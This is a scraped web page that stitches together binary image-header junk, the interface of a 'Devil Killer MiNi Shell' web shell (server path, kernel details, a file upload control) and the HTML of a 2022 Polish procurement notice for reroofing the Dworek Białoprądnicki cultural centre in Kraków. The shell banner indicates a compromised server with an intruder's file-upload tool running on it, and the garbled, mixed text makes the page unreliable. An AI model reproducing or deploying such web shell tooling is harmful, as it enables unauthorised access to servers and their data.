JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220531/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220531/0018681601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana istniejących pokryć dachowych z gontu drewnianego łupanego wraz z robotami towarzyszącymi na budynkach CK „Dworek Białoprądnicki”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Kultury &#34;Dworek Białoprądnicki&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000284517</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Papiernicza 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-221</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dworek.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dworek.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana istniejących pokryć dachowych z gontu drewnianego łupanego wraz z robotami towarzyszącymi na budynkach CK „Dworek Białoprądnicki”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-46caab40-e0cc-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00186816</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00076464/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Wymiana istniejących pokryć dachowych z gontu drewnianego wraz z robotami towarzyszącymi na budynkach Centrum Kultury „Dworek Białoprądnicki” przy ul. Papierniczej 2 w Krakowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.krakow.pl/?bip_id=469&amp;mmi=23129 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.bip.krakow.pl/?bip_id=469&amp;mmi=23129</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: 1. Zg. z art. 63 ust. 2 ustawy, „w post. o<br/>udz. zamówienia lub konkursie o wartości mniejszej niż progi unijne ofertę, (…), ośw., o którym mowa w art. 125 ust. 1, składa się,<br/>pod rygorem nieważności, w formie elektr. lub w postaci elektr. opatrzonej podpisem zaufanym lub podpisem os.”.<br/>2. Forma elektr. oznacza opatrzenie dok. (pliku) elektronicznego kw. podpisem elektr.<br/>3. Rygor nieważności opisany w pkt 10.1. SWZ dotyczy zatem przypadków niedochowania formy złożenia następujących dok.:<br/>3.1. Formularza Oferty i dołączanych do niego innych dok. składających się na sensu stricte treść oferty Wykonawcy.<br/>3.2. Ośw. z art. 125 ust. 1 ustawy, tj. &lt;&lt;ośw. o niepodleganiu wykl., spełnianiu warunków udziału w postępowaniu lub kryteriów<br/>selekcji&gt;&gt;, o których mowa w pkt 13.1.6. SWZ, składanych samodzielnie przez Wykonawców, zgodnie z pkt 13.1.6.2 lit. a SWZ.<br/>3.3. Ośw. z art. 125 ust. 1 ustawy składanych – na podstawie art. 125 ust. 5 ustawy – przez podmioty, o których mowa w pkt 13.1.6.<br/>lit. b SWZ, tj. podmioty, które nie są Wykonawcami, ale udostępniają Wykonawcy swoje zasoby w celu wykazania spełniania<br/>określonego warunku/ów udziału w postępowaniu.<br/>3.4. Pełnomocnictw, o których mowa w pkt 13.1.3. lit. b SWZ.<br/>4. Pozostałe dok. i ośw., inne niż wymienione w pkt 10.3 SWZ, w tym w szcz.:<br/>4.1. podmiotowe środki dowodowe, o których mowa w pkt 13.2. SWZ<br/>4.2. dok. potw. umocowanie do reprezentowania, o których mowa w pkt 13.1.3. –inne niż pełnomocnictwa, odpisy lub informacje z<br/>KRS, CEiDG lub innego właściwego rej.<br/>4.3. zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 13.1.4 SWZ,<br/>4.4. przedmiotowe środki dowodowe – o ile są wymagane w postępowaniu,<br/>4.5. inne niż ww. informacje, ośw. lub dok., przekazywane są w f. elektr. (opatrzonej kwalifikowanym podpisem elektr.), lub w postaci<br/>elektr. opatrzonej podpisem zaufanym lub podpisem os., a zatem z zachowaniem tej samej formy i postaci co dok. wymienione w pkt<br/>10.1. SWZ, z tą różnicą, iż w przypadku niedochowania formy i/lub postaci przekazania brak jest sankcji nieważności.<br/>5. Formaty danych wymagane do sporządzania i przekazywania dokumentów i informacji w postępowaniu określa § 2 rozp. PRM z<br/>dnia 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań tech. dla dok. elektronicznych oraz<br/>środków kom. elektr. w postępowaniu o udzielenie zamówienia publicznego lub konkursie. Zamawiający wskazuje jednak, że wśród<br/>dopuszczalnych i ogólnie dostępnych formatów znajdują się m.in.: .txt, .rtf, .pdf, .doc, .docx, .odt.<br/>6. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej może zawsze dokonać notariusz.<br/>Ponadto szczegółowe zasady poświadczania różnych kat. dokumentów opisuje § 6 ust. 3 Rozp. przywołanego w pkt 10.5. SWZ<br/>powyżej.<br/>7. W Formularzu oferty wartości liczbowe należy wpisywać w każdej pozycji wyłącznie cyframi, a w miejscach gdzie jest to wyraźnie<br/>wskazane także słownie (nie stosuje się wyrażenia „jw.” i równoważnych).<br/>8. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w j. obcym<br/>przekazuje się wraz z tłumaczeniem na j. polski.<br/>9. Zamawiający zastrzega sobie ponadto możliwość żądania, aby w przypadku wskazania przez Wykonawcę dostępności<br/>podmiotowych środków dowodowych lub dokumentów, o których mowa w pkt 13.1.3. lit. a SWZ, pod określonymi adresami<br/>internetowymi ogólnodostępnych i bezpłatnych baz danych, przedstawił on tłumaczenia na język polski pobranych samodzielnie<br/>przez Zamawiającego podmiotowych środków dowodowych lub dokumentów.<br/>10. W zakresie nieuregulowanym ustawą lub niniejszą SWZ do podmiotowych śr. dowodowych, ośw. i dok. składanych przez<br/>Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia przywołanego w pkt 10.3. SWZ powyżej<br/>oraz rozp. MRPiT z dnia 23.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dok. lub ośw., jakich może żądać<br/>zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ilekroć w niniejszej SWZ jest mowa o RODO, należy<br/>przez to rozumieć: Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia<br/>2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i wsprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1).2. Wykonawca ubiegający się o udzielenie<br/>zamówienia publicznego jest zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych<br/>związanych z udziałem w postępowaniu. Do obowiązków tych należą m.in.obowiązki wynikające z<br/>Ogłoszenie nr 2022/BZP 00078119/01 z dnia 2022-03-08<br/>2022-03-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>RODO, w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób<br/>fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał.<br/>Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będziemiał zastosowania, gdy i w<br/>zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (por. art. 13<br/>ust. 4). Ponadto Wykonawca zobowiązany jest wypełnić obowiązek informacyjny wynikający z art. 14<br/>RODO względem osób fizycznych, których dane przekazuje Zamawiającemu i których dane pośrednio<br/>pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5<br/>RODO. W celu zapewnienia, że Wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony<br/>prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem<br/>wykonawcy w postępowaniu Zamawiający wymaga złożenia przez Wykonawcę wraz z ofertą<br/>oświadczenia o wypełnieniu obowiązków informacyjnych, przewidzianych w art. 13 lub art. 14 RODO, .<br/>Ponadto, zgodnie zart. 18 ust. 6 ustawy, Zamawiający zastrzega, że będzie udostępniał dane<br/>osobowe, o których mowa w art. 10 RODO, w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dzialeIX, do upływu terminu na ich wniesienie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP/2/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia jest wykonanie robót budowlanych dla inwestycji pod nazwą „Wymiana istniejących pokryć dachowych z gontu drewnianego łupanego wraz z robotami towarzyszącymi na budynkach: Głównym, Oficynie Zachodniej, Oficynie Wschodniej, oraz budynku gospodarczym Centrum Kultury „Dworek Białoprądnicki” na działce nr 224 obr. 42 jedn. ewid. Krowodrza przy ul. Papierniczej 2 w Krakowie”. 4.5.	Zakres realizowanych prac został szczegółowo opisany w dokumentacji: projekcie architektoniczno-budowlanym, STWIORB, BIOZ, przedmiarze robót, Decyzji nr 249/6740.2/2022 Prezydenta Miasta Krakowa z dnia 11.05.2022 r., Pozwoleniu nr 275/22 z dnia 07.04.2022 r. Miejskiego Konserwatora Zabytków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111100-9 - Roboty w zakresie burzenia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45262600-7 - Różne specjalne roboty budowlane</p> <p class="mb-0">45432210-9 - Wykładanie ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena w kryterium „Okres gwarancji”:<br/>1) Okres gwarancji należy określić w pełnych miesiącach. Najkrótszy wymagany okres gwarancji to 60 miesięcy.<br/>2) W przypadku podania okresu dłuższego niż 120 miesięcy oferta otrzyma ilość punktów jak za okres o długości 120 miesięcy.<br/>3) Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów łącznie ze wszystkich kryteriów. Ocenę<br/>łączną oferty stanowi suma punktów uzyskanych w ramach poszczególnych kryteriów.<br/>4) Oferta może uzyskać w kryteriach oceny ofert maksymalnie 100 punktów (100%), przy czym 1 pkt = 1%. Maksymalna liczba<br/>Ogłoszenie nr 2022/BZP 00078119/01 z dnia 2022-03-08<br/>2022-03-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>punktów w kryterium równa jest określonej wadze kryterium w %. Uzyskana liczba punktów w ramach kryterium zaokrąglana będzie<br/>do drugiego miejsca po przecinku.<br/>Za ofertę najkorzystniejszą będzie uznana oferta, która przy uwzględnieniu powyższych kryteriów i ich wag otrzyma najwyższą<br/>punktację. Przy obliczaniu punktów, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku według zasady, że trzecia<br/>cyfra po przecinku od 5 włącznie w górę powoduje zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po<br/>przecinku jest mniejsza niż 5, to druga cyfra po przecinku nie ulega zmianie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 12.5.	Warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ZamPublU:<br/>12.5.1.	Posiadanie zdolności do występowania w obrocie gospodarczym:<br/>Warunek: Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/>12.5.2.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Warunek: Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/>12.5.3.	Sytuacja ekonomiczna i finansowa:<br/>1) Warunek:<br/>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 500 000,00 zł.<br/>2) Dokument potwierdzający spełnienia warunku:<br/>Opłacona polisa ubezpieczeniowa od odpowiedzialności cywilnej na kwotę nie mniejszą niż 500 000,00 zł.<br/>12.5.4.	Zdolność techniczna lub zawodowa:<br/>1) Warunek: wykonał co najmniej: w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie należycie wykonał co najmniej 3 roboty budowlane polegające na wymianie drewnianych gontów o wartości nie mniejszej niż 400 000 zł brutto.<br/>2) Dokumenty potwierdzający spełnienie warunku:<br/>a) wykaz wykonanych robót budowlanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie z podaniem wartości przedmiotu zamówienia, dat wykonania i odbiorców (inwestorów) oraz<br/>b) dokumenty potwierdzające ich należyte wykonanie.<br/>12.5.5.	Zdolność zawodowa:<br/>1) Warunek:<br/>Wykonawca dysponuje co najmniej jedną osobą przewidzianą do kierowania robotami budowlanymi wchodzącymi w zakres zamówienia, posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, legitymującą się aktualnym wpisem na listę członków właściwej izby samorządu zawodowego. – posiadającymi co najmniej trzyletnie doświadczenie zawodowe. Okres doświadczenia należy liczyć od momentu uzyskania uprawnień budowlanych do dnia złożenia oferty.<br/>2) Dokument potwierdzający spełnienie warunku:<br/>Wykaz osób skierowanych do realizacji przedmiotu zamówienia publicznego, posiadających uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia nie mniejszego niż 2 lata i wykształcenia, niezbędnych do realizacji zamówienia publicznego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">13.1.8.	Wykaz robót wykonanych lub wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane/ są wykonywane oraz z załączeniem dowodów określających czy te roboty zostały wykonane/ są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty były wykonywane/ są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy, na potwierdzenie spełniania warunku posiadania doświadczenia<br/>13.1.9.	Opłacona polisa ubezpieczeniowa od odpowiedzialności cywilnej na kwotę nie mniejszą niż 500 000,00 zł.<br/>13.1.10.	Wykaz osób skierowanych do realizacji przedmiotu zamówienia publicznego, posiadających uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia nie mniejszego niż 2 lata i wykształcenia, niezbędnych do realizacji zamówienia publicznego.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1 Formularz Oferty, według wzoru stanowiącego załącznik nr 1 do SWZ, wypełniony i podpisany przez osoby umocowane<br/>należycie do reprezentowania Wykonawcy.<br/>2. Kosztorys ofertowy<br/>3. Dokumenty potwierdzające, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, a<br/>zatem:<br/>a) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, chyba że Wykonawca w Formularzu Oferty wskaże dane umożliwiające dostęp do tych<br/>dokumentów samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych;<br/>b) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w jego imieniu<br/>działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów wymienionych w lit. a) powyżej;<br/>Opisane powyżej zasady stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o<br/>udzielenie niniejszego zamówienia oraz do osoby działającej w imieniu podmiotu udostępniającego zasoby, zgodnie z pkt.<br/>13.1.4.<br/>4. Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na<br/>potrzeby realizacji zamówienia, lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, jako dowód polegania na zdolnościach<br/>technicznych lub zawodowych tego podmiotu, w odniesieniu do warunków udziału w postępowaniu, o których mowa w 